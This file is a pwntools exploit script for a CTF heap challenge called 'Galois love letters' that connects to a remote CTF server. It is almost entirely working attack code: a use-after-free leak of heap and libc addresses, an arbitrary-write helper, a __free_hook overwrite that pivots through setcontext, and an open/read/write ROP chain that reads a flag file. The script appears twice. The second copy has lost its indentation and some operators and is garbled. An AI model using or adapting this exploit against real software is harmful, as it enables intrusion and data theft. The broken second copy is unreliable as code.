hkraw/Galois_love_letters_exp.py

## Galois_love_letters_exp.py
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from binascii import hexlify, unhexlify
import subprocess
import random

# Utils
def Encrypt(index,note=None,data=None):
        io.sendlineafter('> ','1')
        io.sendlineafter('Index: ',f'{index}')
        io.sendafter('Note: ',note)
        io.sendafter('Text: ',data)

def Decrypt(index):
        io.sendlineafter('> ','2')
        io.sendlineafter('Index: ',f'{index}')

def Edit(index,newnote=None,newdata=None):
        io.sendlineafter('> ','3')
        io.sendlineafter('Index: ',f'{index}')
        io.sendafter('New note: ',newnote)
        io.sendafter('New text: ',newdata)

def Delete(index):
        io.sendlineafter('> ','4')
        io.sendlineafter('Index: ',f'{index}')


def Arbwrite(what,where,heap_base):
        Encrypt(0,note='A',data='A')
        Encrypt(1,note='A',data='A')
        Delete(1)
        Delete(0)
        Edit(0,newnote=p64(heap_base+0xe80),newdata='A')
        Encrypt(0,'A','A')
        Encrypt(0,note=p64(where),data='A')
        Edit(2,newnote=p64(what),newdata='A')


# Addr
libc_leak_offset = 0x1ecf60
__free_hook = 0x1eeb28
setcontext = 0x580a0

# Gadgets
L_SYSCALL = 0x000e7559
L_POP_RDI = 0x0015b427
L_POP_RSI = 0x0014d1da
L_POP_RDX = 0x00162866 # pop rdx ; pop xxx ; ret
L_POP_RAX = 0x00112cfb

# Hack
def Hack():
        global io

        Encrypt(0,note='A'*0x8,data='A'*0x8) #0
        Encrypt(1,note='A'*0x8,data='B'*0x8) #1
        Encrypt(2,note='B'*0x8,data='C'*0x8) #2
        Delete(0)
        Decrypt(0)
        io.recvuntil('): ')
        heap_base = u64(unhexlify(io.recvline().strip()))-0xf00
        print(hex(heap_base))
        Edit(0,newnote=p64(heap_base+0xe80),newdata='\n')

        Encrypt(0,note='A'*0x8,data='A')
        Encrypt(3,note=p64(heap_base+0x650),data='A')

        Decrypt(2)
        io.recvuntil('): ')
        libc_leak = u64(unhexlify(io.recvline().strip()))
        libc_base = libc_leak - libc_leak_offset
        print(hex(libc_base))
        Encrypt(5,'A','A') #heap base + 0x1130

        #0x00154930: mov rdx, qword [rdi+0x08] ; mov qword [rsp], rax ; call qword [rdx+0x20] ;  (1 found)
        Arbwrite(what=heap_base+0x1168,where=heap_base+0x1178,heap_base=heap_base)
        Arbwrite(what=libc_base+setcontext+61,where=heap_base+0x1188,heap_base=heap_base)
        Arbwrite(what=heap_base+0x2000,where=heap_base+0x1168+0xa0,heap_base=heap_base)
        Arbwrite(what=libc_base+L_POP_RDI,where=heap_base+0x1160+0xb0,heap_base=heap_base)
        Arbwrite(what=libc_base+L_POP_RDI,where=heap_base+0x2000+0x8,heap_base=heap_base)
        Arbwrite(what=libc_base+L_POP_RSI,where=heap_base+0x2000+0x18,heap_base=heap_base)
        Arbwrite(what=heap_base+0x2000,where=heap_base+0x2000+0x20,heap_base=heap_base)
        Arbwrite(what=libc_base+L_POP_RDX,where=heap_base+0x2000+0x28,heap_base=heap_base)
        Arbwrite(what=0x1000,where=heap_base+0x2000+0x30,heap_base=heap_base)
        Arbwrite(what=0x1000,where=heap_base+0x2000+0x38,heap_base=heap_base)
        Arbwrite(what=libc_base+L_SYSCALL,where=heap_base+0x2000+0x40,heap_base=heap_base)
        Arbwrite(what=libc_base+0x154930,where=libc_base+__free_hook,heap_base=heap_base)
        Delete(5)

        L_ROP = b'/home/ctf/flag.txt\0'.ljust(0x48,b'\0')+\
                p64(libc_base+L_POP_RDI)+p64(heap_base+0x2000)+\
                p64(libc_base+L_POP_RSI)+p64(0)+\
                p64(libc_base+L_POP_RDX)+p64(0x100)+p64(0)+\
                p64(libc_base+L_POP_RAX)+p64(0x2)+\
                p64(libc_base+L_SYSCALL)+\
                p64(libc_base+L_POP_RDI)+p64(3)+\
                p64(libc_base+L_POP_RSI)+p64(heap_base)+\
                p64(libc_base+L_POP_RAX)+p64(0)+\
                p64(libc_base+L_SYSCALL)+\
                p64(libc_base+L_POP_RAX)+p64(1)+\
                p64(libc_base+L_POP_RDI)+p64(1)+\
                p64(libc_base+L_SYSCALL)
        io.send(L_ROP)

# Pwn
if __name__=='__main__':
#       io = process('./chall')
        io = remote('challs.xmas.htsp.ro', 2007)
        Hack()
        io.interactive()
	#!/usr/bin/python3
	from pwn import *
	from past.builtins import xrange
	from time import sleep
	from binascii import hexlify, unhexlify
	import subprocess
	import random

	# Utils
	def Encrypt(index,note=None,data=None):
	io.sendlineafter('> ','1')
	io.sendlineafter('Index: ',f'{index}')
	io.sendafter('Note: ',note)
	io.sendafter('Text: ',data)

	def Decrypt(index):
	io.sendlineafter('> ','2')
	io.sendlineafter('Index: ',f'{index}')

	def Edit(index,newnote=None,newdata=None):
	io.sendlineafter('> ','3')
	io.sendlineafter('Index: ',f'{index}')
	io.sendafter('New note: ',newnote)
	io.sendafter('New text: ',newdata)

	def Delete(index):
	io.sendlineafter('> ','4')
	io.sendlineafter('Index: ',f'{index}')


	def Arbwrite(what,where,heap_base):
	Encrypt(0,note='A',data='A')
	Encrypt(1,note='A',data='A')
	Delete(1)
	Delete(0)
	Edit(0,newnote=p64(heap_base+0xe80),newdata='A')
	Encrypt(0,'A','A')
	Encrypt(0,note=p64(where),data='A')
	Edit(2,newnote=p64(what),newdata='A')


	# Addr
	libc_leak_offset = 0x1ecf60
	__free_hook = 0x1eeb28
	setcontext = 0x580a0

	# Gadgets
	L_SYSCALL = 0x000e7559
	L_POP_RDI = 0x0015b427
	L_POP_RSI = 0x0014d1da
	L_POP_RDX = 0x00162866 # pop rdx ; pop xxx ; ret
	L_POP_RAX = 0x00112cfb

	# Hack
	def Hack():
	global io

	Encrypt(0,note='A'0x8,data='A'0x8) #0
	Encrypt(1,note='A'0x8,data='B'0x8) #1
	Encrypt(2,note='B'0x8,data='C'0x8) #2
	Delete(0)
	Decrypt(0)
	io.recvuntil('): ')
	heap_base = u64(unhexlify(io.recvline().strip()))-0xf00
	print(hex(heap_base))
	Edit(0,newnote=p64(heap_base+0xe80),newdata='\n')

	Encrypt(0,note='A'*0x8,data='A')
	Encrypt(3,note=p64(heap_base+0x650),data='A')

	Decrypt(2)
	io.recvuntil('): ')
	libc_leak = u64(unhexlify(io.recvline().strip()))
	libc_base = libc_leak - libc_leak_offset
	print(hex(libc_base))
	Encrypt(5,'A','A') #heap base + 0x1130

	#0x00154930: mov rdx, qword [rdi+0x08] ; mov qword [rsp], rax ; call qword [rdx+0x20] ; (1 found)
	Arbwrite(what=heap_base+0x1168,where=heap_base+0x1178,heap_base=heap_base)
	Arbwrite(what=libc_base+setcontext+61,where=heap_base+0x1188,heap_base=heap_base)
	Arbwrite(what=heap_base+0x2000,where=heap_base+0x1168+0xa0,heap_base=heap_base)
	Arbwrite(what=libc_base+L_POP_RDI,where=heap_base+0x1160+0xb0,heap_base=heap_base)
	Arbwrite(what=libc_base+L_POP_RDI,where=heap_base+0x2000+0x8,heap_base=heap_base)
	Arbwrite(what=libc_base+L_POP_RSI,where=heap_base+0x2000+0x18,heap_base=heap_base)
	Arbwrite(what=heap_base+0x2000,where=heap_base+0x2000+0x20,heap_base=heap_base)
	Arbwrite(what=libc_base+L_POP_RDX,where=heap_base+0x2000+0x28,heap_base=heap_base)
	Arbwrite(what=0x1000,where=heap_base+0x2000+0x30,heap_base=heap_base)
	Arbwrite(what=0x1000,where=heap_base+0x2000+0x38,heap_base=heap_base)
	Arbwrite(what=libc_base+L_SYSCALL,where=heap_base+0x2000+0x40,heap_base=heap_base)
	Arbwrite(what=libc_base+0x154930,where=libc_base+__free_hook,heap_base=heap_base)
	Delete(5)

	L_ROP = b'/home/ctf/flag.txt\0'.ljust(0x48,b'\0')+\
	p64(libc_base+L_POP_RDI)+p64(heap_base+0x2000)+\
	p64(libc_base+L_POP_RSI)+p64(0)+\
	p64(libc_base+L_POP_RDX)+p64(0x100)+p64(0)+\
	p64(libc_base+L_POP_RAX)+p64(0x2)+\
	p64(libc_base+L_SYSCALL)+\
	p64(libc_base+L_POP_RDI)+p64(3)+\
	p64(libc_base+L_POP_RSI)+p64(heap_base)+\
	p64(libc_base+L_POP_RAX)+p64(0)+\
	p64(libc_base+L_SYSCALL)+\
	p64(libc_base+L_POP_RAX)+p64(1)+\
	p64(libc_base+L_POP_RDI)+p64(1)+\
	p64(libc_base+L_SYSCALL)
	io.send(L_ROP)

	# Pwn
	if __name__=='__main__':
	# io = process('./chall')
	io = remote('challs.xmas.htsp.ro', 2007)
	Hack()
	io.interactive()